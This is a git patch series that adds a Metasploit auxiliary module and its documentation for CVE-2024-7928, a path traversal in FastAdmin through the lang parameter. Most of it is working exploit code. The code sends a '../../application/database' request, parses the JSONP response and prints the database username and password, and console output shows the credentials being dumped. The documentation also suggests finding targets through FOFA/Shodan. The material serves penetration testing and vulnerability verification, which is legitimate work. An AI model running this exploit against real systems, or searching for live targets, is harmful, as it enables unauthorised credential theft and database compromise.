From 9caf92e40e741915c41f8cb7c74e2c54bc002b96 Mon Sep 17 00:00:00 2001 From: Halil <90972683+Kazgangap@users.noreply.github.com> Date: Thu, 17 Apr 2025 12:10:01 +0300 Subject: [PATCH 1/5] add fastadmin_path_traversal_cve_2024_7928.md --- .../fastadmin_path_traversal_cve_2024_7928.md | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md diff --git a/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md new file mode 100644 index 0000000000000..0ceb8a7308896 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md @@ -0,0 +1,59 @@ +## Vulnerable Application + +This module exploits a path traversal vulnerability in FastAdmin versions up to `1.3.3.20220121`, specifically within the `/index/ajax/lang` endpoint. +By manipulating the `lang` parameter, unauthenticated remote attackers can access arbitrary files on the server, such as configuration files containing sensitive credentials. +The vulnerability (CVE-2024-7928) has been publicly disclosed and is fixed in version `1.3.4.20220530`. + +- Affected version: <= 1.3.3.20220121 +- Fixed version: 1.3.4.20220530 +- CVE: [CVE-2024-7928](https://nvd.nist.gov/vuln/detail/CVE-2024-7928) +- Advisory: https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928 + +## Verification Steps + +1. Install the vulnerable version of FastAdmin or find targets using FOFA/Shodan. +2. Start `msfconsole` +3. Run: `use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928` +4. Set `RHOSTS` +5. Run the module with `run` +6. On success, database credentials should be printed to the console + +## Options + +``` +msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > show options + +Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.0.2.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The base path to FastAdmin instance + THREADS 1 yes The number of concurrent threads (max one per host) + VHOST no HTTP server virtual host +``` + +## Scenarios + +### FastAdmin 1.3.3.20220121 deployed with default configuration + +``` +msf6 > use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928 +msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > set RHOSTS 192.0.2.10 +rhosts => 192.0.2.10 +msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run + +[+] 192.0.2.10 is vulnerable! +[+] DB Type : mysql +[+] Hostname : +[+] Database : fastadmin +[+] Username : root +[+] Password : +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` + + From fd75757562e13509a03d8aabe01ad439526cbaf0 Mon Sep 17 00:00:00 2001 From: Halil <90972683+Kazgangap@users.noreply.github.com> Date: Thu, 17 Apr 2025 12:10:35 +0300 Subject: [PATCH 2/5] add fastadmin_path_traversal_cve_2024_7928.rb --- .../fastadmin_path_traversal_cve_2024_7928.rb | 97 +++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb diff --git a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb new file mode 100644 index 0000000000000..e3247dcb5569d --- /dev/null +++ b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'FastAdmin Path Traversal', + 'Description' => %q{ + This module exploits a path traversal vulnerability in FastAdmin versions up to 1.3.3.20220121, + specifically within the /index/ajax/lang endpoint. By manipulating the `lang` parameter, remote + attackers can traverse directories and access arbitrary files on the server, such as sensitive + configuration files including database credentials. This vulnerability, identified as CVE-2024-7928, + allows unauthenticated access and has been publicly disclosed, making it a viable target for + exploitation in the wild. The issue is resolved in version 1.3.4.20220530. + }, + 'References' => [ + ['CVE', '2024-7928'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'], + ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928'] + ], + 'Author' => [ + 'Rabbit 的个人中心', # Vulnerability discovery + 'bigb0x', # Python script + 'Kazgangap' # Metasploit module + ], + 'DisclosureDate' => '2024-08-19', + 'License' => MSF_LICENSE, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + )) + + register_options([ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/']) + ]) + end + + def run_host(ip) + url = normalize_uri(datastore['TARGETURI'], 'index/ajax/lang?lang=../../application/database') + begin + res = send_request_cgi({ + 'uri' => url, + 'method' => 'GET', + 'ssl' => datastore['SSL'] + }) + + unless res && res.code == 200 && res.body.include?('jsonpReturn(') + print_error("#{ip} is not vulnerable or did not respond as expected.") + return + end + + jsonp_match = res.body.match(/jsonpReturn\((.*)\);/) + unless jsonp_match + print_error("#{ip} - Failed to find JSONP structure in response body.") + return + end + + begin + data = JSON.parse(jsonp_match[1].strip) + rescue JSON::ParserError => e + print_error("#{ip} - Failed to parse JSONP response: #{e.message}") + return + end + + unless data['username'] && data['password'] && data['database'] + print_error("#{ip} - Required fields missing in response.") + return + end + + print_good("#{ip} is vulnerable!") + print_good("DB Type : #{data['type']}") + print_good("Hostname : #{data['hostname']}") + print_good("Database : #{data['database']}") + print_good("Username : #{data['username']}") + print_good("Password : #{data['password']}") + + report_note( + host: ip, + port: rport, + type: 'fastadmin.db.info', + data: data, + update: :unique_data + ) + rescue ::Exception => e + print_error("#{ip} - Error occurred: #{e.message}") + end + end +end From 810ce218415bf36b215a152d6a9af392dd01716e Mon Sep 17 00:00:00 2001 From: Halil <90972683+Kazgangap@users.noreply.github.com> Date: Thu, 17 Apr 2025 21:22:14 +0300 Subject: [PATCH 3/5] Update fastadmin_path_traversal_cve_2024_7928.rb --- .../fastadmin_path_traversal_cve_2024_7928.rb | 147 +++++++++--------- 1 file changed, 72 insertions(+), 75 deletions(-) diff --git a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb index e3247dcb5569d..c952585cd0a33 100644 --- a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb +++ b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb @@ -1,97 +1,94 @@ +# frozen_string_literal: true + ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## +# Metasploit auxiliary module to exploit path traversal vulnerability (CVE-2024-7928) in FastAdmin and extract database credentials. class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info = {}) - super(update_info( - info, - 'Name' => 'FastAdmin Path Traversal', - 'Description' => %q{ - This module exploits a path traversal vulnerability in FastAdmin versions up to 1.3.3.20220121, - specifically within the /index/ajax/lang endpoint. By manipulating the `lang` parameter, remote - attackers can traverse directories and access arbitrary files on the server, such as sensitive - configuration files including database credentials. This vulnerability, identified as CVE-2024-7928, - allows unauthenticated access and has been publicly disclosed, making it a viable target for - exploitation in the wild. The issue is resolved in version 1.3.4.20220530. - }, - 'References' => [ - ['CVE', '2024-7928'], - ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'], - ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928'] - ], - 'Author' => [ - 'Rabbit 的个人中心', # Vulnerability discovery - 'bigb0x', # Python script - 'Kazgangap' # Metasploit module - ], - 'DisclosureDate' => '2024-08-19', - 'License' => MSF_LICENSE, - 'Notes' => { - 'Stability' => [CRASH_SAFE], - 'SideEffects' => [IOC_IN_LOGS], - 'Reliability' => [] - } - )) + super( + update_info( + info, + 'Name' => 'FastAdmin Path Traversal', + 'Description' => 'Exploits path traversal vulnerability in FastAdmin (CVE-2024-7928) affecting versions up to 1.3.3.20220121, allowing unauthorized access to sensitive files via the lang parameter.', + 'References' => [ + %w[CVE 2024-7928], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'], + ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928'] + ], + 'Author' => [ + 'Rabbit 的个人中心', # Vulnerability discovery + 'bigb0x', # Python script + 'Kazgangap' # Metasploit module + ], + 'DisclosureDate' => '2024-08-19', + 'License' => MSF_LICENSE, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options([ - Opt::RPORT(80), - OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/']) - ]) + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/']) + ] + ) end - def run_host(ip) + def run_host(host) url = normalize_uri(datastore['TARGETURI'], 'index/ajax/lang?lang=../../application/database') - begin - res = send_request_cgi({ - 'uri' => url, - 'method' => 'GET', - 'ssl' => datastore['SSL'] - }) - - unless res && res.code == 200 && res.body.include?('jsonpReturn(') - print_error("#{ip} is not vulnerable or did not respond as expected.") - return - end - jsonp_match = res.body.match(/jsonpReturn\((.*)\);/) - unless jsonp_match - print_error("#{ip} - Failed to find JSONP structure in response body.") - return - end + res = send_request_cgi('uri' => url, 'method' => 'GET') + unless res&.code == 200 && res.body.include?('jsonpReturn(') + print_error("#{host} is not vulnerable or did not respond as expected.") + return + end - begin - data = JSON.parse(jsonp_match[1].strip) - rescue JSON::ParserError => e - print_error("#{ip} - Failed to parse JSONP response: #{e.message}") - return - end + jsonp_match = res.body.match(/jsonpReturn\((.*)\);/) + return print_error("#{host} - Failed to find JSONP structure.") unless jsonp_match - unless data['username'] && data['password'] && data['database'] - print_error("#{ip} - Required fields missing in response.") - return - end + parse_jsonp_response(host, jsonp_match[1].strip) + rescue StandardError => e + print_error("#{host} - Error occurred: #{e.message}") + end - print_good("#{ip} is vulnerable!") - print_good("DB Type : #{data['type']}") - print_good("Hostname : #{data['hostname']}") - print_good("Database : #{data['database']}") - print_good("Username : #{data['username']}") - print_good("Password : #{data['password']}") + def parse_jsonp_response(host, jsonp_data) + data = parse_json(jsonp_data) + return unless data - report_note( - host: ip, - port: rport, - type: 'fastadmin.db.info', - data: data, - update: :unique_data - ) - rescue ::Exception => e - print_error("#{ip} - Error occurred: #{e.message}") + unless data.dig('username') && data.dig('password') && data.dig('database') + print_error("#{host} - Required fields missing in response.") + return end + + print_good("#{host} is vulnerable!") + print_good("DB Type : #{data['type']}") + print_good("Hostname : #{data['hostname']}") + print_good("Database : #{data['database']}") + print_good("Username : #{data['username']}") + print_good("Password : #{data['password']}") + + report_note( + host: host, + port: rport, + type: 'fastadmin.db.info', + data: data, + update: :unique_data + ) + end + + def parse_json(jsonp_data) + JSON.parse(jsonp_data) + rescue JSON::ParserError => e + print_error("Failed to parse JSONP response: #{e.message}") + nil end end From 2212ceb27d5a54e72184ca8ce0f146bb2849a6e7 Mon Sep 17 00:00:00 2001 From: Halil <90972683+Kazgangap@users.noreply.github.com> Date: Thu, 17 Apr 2025 21:23:20 +0300 Subject: [PATCH 4/5] Update fastadmin_path_traversal_cve_2024_7928.md --- .../fastadmin_path_traversal_cve_2024_7928.md | 74 +++++++++++++++++-- 1 file changed, 68 insertions(+), 6 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md index 0ceb8a7308896..85c1a8e693a39 100644 --- a/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md +++ b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md @@ -9,22 +9,85 @@ The vulnerability (CVE-2024-7928) has been publicly disclosed and is fixed in ve - CVE: [CVE-2024-7928](https://nvd.nist.gov/vuln/detail/CVE-2024-7928) - Advisory: https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928 +--- + +## Target Setup + +To set up a test environment using the vulnerable version of FastAdmin: + +1. **Install Dependencies** + Ensure you have the following installed: + - PHP >= 7.1 + - MySQL or MariaDB + - Web server (Apache or Nginx) + +2. **Download Vulnerable FastAdmin Version from Official Repo** + ```bash + git clone https://github.com/fastadminnet/fastadmin.git + cd fastadmin + git checkout 1.3.3.20220121 + ``` + +3. **Move to Web Server Directory** + Copy or move the project to your web server root: + ```bash + sudo mv fastadmin /var/www/html/ + cd /var/www/html/fastadmin + ``` + +4. **Set Permissions** + ```bash + sudo chown -R www-data:www-data . + sudo chmod -R 755 . + ``` + +5. **Create Database** + Log into MySQL and run: + ```sql + CREATE DATABASE fastadmin DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci; + ``` + +6. **Configure Database Connection** + Edit `application/database.php` and set your DB credentials: + ```php + 'hostname' => '127.0.0.1', + 'database' => 'fastadmin', + 'username' => 'root', + 'password' => 'yourpassword', + ``` + +7. **Import the Database Schema** + ```bash + mysql -u root -p fastadmin < fastadmin.sql + ``` + +--- + ## Verification Steps 1. Install the vulnerable version of FastAdmin or find targets using FOFA/Shodan. 2. Start `msfconsole` -3. Run: `use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928` -4. Set `RHOSTS` +3. Run: + ``` + use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928 + ``` +4. Set `RHOSTS` and `RPORT` + ``` + set RHOSTS 192.0.2.10 + set RPORT 80 # Or the port you are targeting + + ``` 5. Run the module with `run` 6. On success, database credentials should be printed to the console +--- + ## Options ``` msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > show options Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928): - Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] @@ -36,6 +99,8 @@ Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928): VHOST no HTTP server virtual host ``` +--- + ## Scenarios ### FastAdmin 1.3.3.20220121 deployed with default configuration @@ -45,7 +110,6 @@ msf6 > use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928 msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > set RHOSTS 192.0.2.10 rhosts => 192.0.2.10 msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run - [+] 192.0.2.10 is vulnerable! [+] DB Type : mysql [+] Hostname : @@ -55,5 +119,3 @@ msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` - - From fbda845e783c9b85ce00e8751b0c4103fbebaf62 Mon Sep 17 00:00:00 2001 From: Diego Ledda Date: Mon, 28 Apr 2025 10:23:50 +0200 Subject: [PATCH 5/5] chore: reverted suggestion to fix rubocop --- .../scanner/http/fastadmin_path_traversal_cve_2024_7928.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb index c952585cd0a33..11afd920534c9 100644 --- a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb +++ b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb @@ -64,7 +64,7 @@ def parse_jsonp_response(host, jsonp_data) data = parse_json(jsonp_data) return unless data - unless data.dig('username') && data.dig('password') && data.dig('database') + unless data['username'] && data['password'] && data['database'] print_error("#{host} - Required fields missing in response.") return end